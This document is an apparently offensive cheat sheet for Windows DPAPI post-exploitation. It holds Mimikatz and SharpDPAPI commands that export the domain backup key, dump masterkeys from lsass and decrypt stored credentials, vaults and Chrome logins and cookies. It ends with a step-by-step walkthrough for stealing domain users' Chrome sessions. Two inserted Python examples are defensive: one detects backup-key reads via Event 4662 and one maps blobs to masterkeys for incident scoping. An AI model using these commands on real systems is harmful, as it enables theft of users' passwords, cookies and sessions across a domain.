DPAPI
In a domain admin post-exploitation scenario, dump the domain backup key first, then decrypt whatever you need by adding the option /pvk:key.pvk to SharpDPAPI.
Retrieve domain backup key
With DA rights and the DPAPI domain backup key, it is possible to decrypt any domain user masterkey.
lsadump::backupkeys /system:<DC> /export
By default it uses the current DC, and the output is Base64.
SharpDPAPI.exe backupkey [/server:SERVER.domain] [/file:key.pvk]
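Detection counterpart, as an added example that is not from the original cheat sheet: both lsadump::backupkeys and SharpDPAPI backupkey read the BCKUPKEY LSA secrets on a domain controller, and with object-access auditing enabled the DC records that read as Event ID 4662. The event shape used below (Object Type SecretObject, Object Name under Policy\Secrets containing BCKUPKEY, access mask 0x2 for "Query secret value") follows public write-ups of this detection; the key/value record layout and the sample records are constructed for the example, so compare them with a 4662 event from your own DC before deploying the rule.

```python
"""Flag Security events that show a DPAPI domain backup key being read on a DC.

Added example, not part of the original page. Reads of the BCKUPKEY secrets are
rare in normal operation (clients fetch the backup key through MS-BKRP, not by
querying the secret object), so every hit is worth triage.
"""
from typing import Dict, FrozenSet, Iterable, List

# Access-mask bit for "Query secret value" on an LSA secret object.
# Assumption: this is the access an export of the backup key needs.
SECRET_QUERY_VALUE = 0x2

# Constructed sample records in a simple "Field: value" layout, one record per
# "---" block. Not real log data; the GUID in the second record is made up.
SAMPLE_EVENTS = """\
Event ID: 4662
Subject User Name: alice
Subject Domain Name: CORP
Object Type: SecretObject
Object Name: Policy\\Secrets\\G$BCKUPKEY_PREFERRED
Access Mask: 0x2
---
Event ID: 4662
Subject User Name: alice
Subject Domain Name: CORP
Object Type: SecretObject
Object Name: Policy\\Secrets\\G$BCKUPKEY_00000000-1111-2222-3333-444444444444
Access Mask: 0x2
---
Event ID: 4662
Subject User Name: DC01$
Subject Domain Name: CORP
Object Type: SecretObject
Object Name: Policy\\Secrets\\SomeOtherSecret
Access Mask: 0x2
---
Event ID: 4663
Subject User Name: bob
Subject Domain Name: CORP
Object Type: File
Object Name: C:\\Temp\\notes.txt
Access Mask: 0x1
"""


def parse_events(text: str) -> List[Dict[str, str]]:
    """Split '---'-separated records into dicts of field name -> value."""
    events: List[Dict[str, str]] = []
    for record in text.split("---"):
        fields: Dict[str, str] = {}
        for line in record.strip().splitlines():
            key, _, value = line.partition(":")  # split on the first colon only
            if key.strip():
                fields[key.strip()] = value.strip()
        if fields:
            events.append(fields)
    return events


def is_backupkey_read(event: Dict[str, str]) -> bool:
    """True for a 4662 'Query secret value' on a secret whose name contains BCKUPKEY."""
    if event.get("Event ID") != "4662":
        return False
    if event.get("Object Type") != "SecretObject":
        return False
    if "BCKUPKEY" not in event.get("Object Name", "").upper():
        return False
    try:
        mask = int(event.get("Access Mask", "0"), 16)
    except ValueError:
        return False
    return bool(mask & SECRET_QUERY_VALUE)


def backupkey_readers(events: Iterable[Dict[str, str]],
                      allowlist: FrozenSet[str] = frozenset()) -> Dict[str, List[str]]:
    """Map each DOMAIN\\user that read a backup key secret to the secret names touched.

    `allowlist` is empty by default; add principals only after the environment
    has shown a legitimate reason for them to query these secrets.
    """
    hits: Dict[str, List[str]] = {}
    for ev in events:
        if not is_backupkey_read(ev):
            continue
        who = f"{ev.get('Subject Domain Name', '')}\\{ev.get('Subject User Name', '')}"
        if who in allowlist:
            continue
        hits.setdefault(who, []).append(ev["Object Name"])
    return hits


if __name__ == "__main__":
    for principal, secrets in backupkey_readers(parse_events(SAMPLE_EVENTS)).items():
        print(f"{principal} read {len(secrets)} backup key secret(s): {secrets}")
```

The rule deliberately matches any secret name containing BCKUPKEY rather than only G$BCKUPKEY_PREFERRED, because the export tools read the GUID-named key as well as the pointer to the preferred one; the non-matching third and fourth records show that other secret objects and ordinary file-access events are ignored.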
DPAPI blob decryption
mimikatz dpapi::blob /in:C:\..\<blob_file> /masterkey:<masterkey>
Retrieve GUID
dir /a C:\Users\<username>\AppData\Roaming\Microsoft\Credentials
dir /a C:\Users\<username>\AppData\Local\Microsoft\Credentials
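The directory listing above shows which blob files exist, but not which masterkey each one depends on. The GUID of the masterkey sits in clear text in every DPAPI blob header, so the mapping can be made without any key material, which is what an incident responder needs when scoping which files a leaked masterkey or backup key exposes. The following parser is an added example, not code from the original page or from SharpDPAPI/Mimikatz; it follows the documented DPAPI_BLOB layout (version, provider GUID, masterkey version, masterkey GUID, flags, description) and the 12-byte header of Credential files, and the file names and GUIDs in the sample set are constructed.

```python
"""Map DPAPI blobs and Credential files to the masterkey GUID each one needs.

Added example, not part of the original page. Header layout of a DPAPI_BLOB
(all little-endian): dwVersion, guidProvider, dwMasterKeyVersion, guidMasterKey,
dwFlags, dwDescriptionLen, pbDescription (UTF-16LE), followed by algorithm,
salt, ciphertext and signature fields this parser does not need. Files under
%APPDATA%\\Microsoft\\Credentials wrap the blob in a 12-byte CREDENTIAL_FILE
header (dwVersion, dwBlobSize, dwUnknown).
"""
import struct
import uuid
from typing import Dict, List

# Fixed provider GUID found in every DPAPI blob (d0 8c 9d df 01 15 d1 11 ... on disk).
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")


def locate_blob(data: bytes) -> int:
    """Return the offset of the DPAPI_BLOB in `data`: 0 for a raw blob, 12 for a
    Credential file. Raises ValueError when neither signature is present."""
    for offset in (0, 12):
        if data[offset + 4:offset + 20] == DPAPI_PROVIDER_GUID.bytes_le:
            return offset
    raise ValueError("no DPAPI provider GUID at offset 4 or 16")


def parse_blob_header(data: bytes) -> Dict[str, object]:
    """Return version, masterkey GUID, flags and description of a blob or Credential file."""
    off = locate_blob(data)
    version, = struct.unpack_from("<I", data, off)
    mk_version, = struct.unpack_from("<I", data, off + 20)
    mk_guid = uuid.UUID(bytes_le=data[off + 24:off + 40])
    flags, desc_len = struct.unpack_from("<II", data, off + 40)
    desc = data[off + 48:off + 48 + desc_len].decode("utf-16-le").rstrip("\x00")
    return {
        "blob_version": version,
        "masterkey_version": mk_version,
        "masterkey_guid": str(mk_guid),
        "flags": flags,
        "description": desc,
        "wrapped_in_credential_file": off == 12,
    }


def group_by_masterkey(files: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Map masterkey GUID -> blob names that need it. Compare the keys of the result
    with the GUID-named files under Protect\\<SID> to see which masterkeys matter."""
    groups: Dict[str, List[str]] = {}
    for name, data in files.items():
        guid = parse_blob_header(data)["masterkey_guid"]
        groups.setdefault(guid, []).append(name)
    return groups


def _constructed_blob(masterkey_guid: str, description: str, credential_file: bool) -> bytes:
    """Build a header-only blob for the demonstration. Constructed test data: it
    contains no ciphertext and the masterkey GUIDs are made up."""
    desc_bytes = (description + "\x00").encode("utf-16-le")
    blob = struct.pack("<I", 1) + DPAPI_PROVIDER_GUID.bytes_le
    blob += struct.pack("<I", 1) + uuid.UUID(masterkey_guid).bytes_le
    blob += struct.pack("<II", 0, len(desc_bytes)) + desc_bytes
    if credential_file:
        return struct.pack("<III", 1, len(blob), 0) + blob
    return blob


# Constructed sample set: two Credential files on one masterkey, one raw blob on another.
SAMPLE_FILES = {
    "Credentials/CRED_FILE_1": _constructed_blob(
        "11111111-2222-3333-4444-555555555555", "Local Credential Data", True),
    "Credentials/CRED_FILE_2": _constructed_blob(
        "11111111-2222-3333-4444-555555555555", "Local Credential Data", True),
    "raw_blob.bin": _constructed_blob(
        "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", "Enterprise Credential Data", False),
}

if __name__ == "__main__":
    for guid, names in group_by_masterkey(SAMPLE_FILES).items():
        print(f"masterkey {guid} protects: {', '.join(names)}")
```

On a real profile, read each file under the two Credentials folders into the dict and the output tells you which Protect\<SID>\<GUID> masterkey files are relevant; a GUID with no matching masterkey file usually means the blob came from another profile or the masterkey was already rotated.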
Extract masterkey
Retrieve the SHA1 representation of the masterkey
Useful when a masterkey is needed for a specific GUID. Once the SHA1 has been dumped from lsass, Mimikatz can use it via the option /masterkey:<SHA1>.
privilege::debug
!sekurlsa::dpapi
!dpapi::cache
Decrypt an offline user's masterkey
Key location:
C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user-SID>\<KEY_GUIDs>
dpapi::masterkey /in:<MASTERKEY_LOCATION> /sid:<USER_SID> /password:<USER_PLAINTEXT> /protected
Extract machine credentials and vaults
SharpDPAPI.exe machinetriage
Decrypt machine masterkey
dpapi::masterkey /in:C:\Windows\System32\Microsoft\Protect\S-1-5-18\<GUID> /system:DPAPI_SYSTEM
SharpDPAPI.exe machinemasterkeys
Decrypt machine vault
SharpDPAPI.exe machinevaults
Extract user credentials, vaults and rdg
SharpDPAPI.exe triage
SharpDPAPI
Extract credentials
SharpDPAPI.exe credentials [{GUID1}:SHA1 {GUID2}:SHA1 ...]
It can also run remotely:
SharpDPAPI.exe credentials /pvk:<BASE64_backup_key> [/server:<server.fqdn_domain>]
Extract vaults
SharpDPAPI.exe vaults [{GUID1}:SHA1 {GUID2}:SHA1 ...]
It can also run remotely:
SharpDPAPI.exe vaults /pvk:<BASE64_backup_key> [/server:<server.fqdn_domain>]
Mimikatz
Step 1 - Masterkey dump when you do not know the user's password
dpapi::masterkey /in:"C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user_SID>\<cred_file>" /rpc
Step 1 - Masterkey dump when you know the user's password
dpapi::masterkey /in:"C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<user_SID>\<cred_file>" /sid:<user_sid> /password:<password> /protected
Step 2 - Data decryption
dpapi::cred /in:C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\<ID> /masterkey:<masterkey>
Google Chrome
SharpChrome
SharpChrome.exe <logins | cookies> /pvk:<key.pvk | BASE64> /format:table [/showall] [/server:<target>]
Mimikatz
If the user's context cannot be obtained, see the other scenarios:
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data"
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Cookies" /unprotect
Stealing Domain Users' sessions
Step 1 - Download the whole Chrome folder
C:\Users\<victim>\AppData\Local\Google\Chrome\User Data\
Step 2 - Download all the cred files in this folder
C:\users\<victim>\appdata\Roaming\Microsoft\Protect\<victim_SID>
Step 3 - On your local machine, copy the masterkey into your Mimikatz folder
xcopy /H <victim_SID>\<cred_file>
Step 4 - Decrypt the user's keys from Mimikatz
dpapi::masterkey /in:<cred_file> /pvk:<domain_backup_key.pvk>
Step 5 - Load the victim's key into memory on your local machine
The password is your local user's password, not the victim's. The szGuid is the name of the <cred_file>.
dpapi::create /guid:{<szGuid>} /key:<private_key> /password:<local user's password> /protected
If you get the error "kuhl_m_dpapi_create ; kull_m_file_writeData (0x00000005)", delete or move the original masterkey file:
del /a <cred_file>
Step 6 - Copy the file into your local user's Protect folder
xcopy /H <Mimikatz_folder>\<cred_file> C:\Users\<local_user>\AppData\Roaming\Microsoft\Protect\<local user's SID>\
Step 7 - Open Google Chrome and enjoy!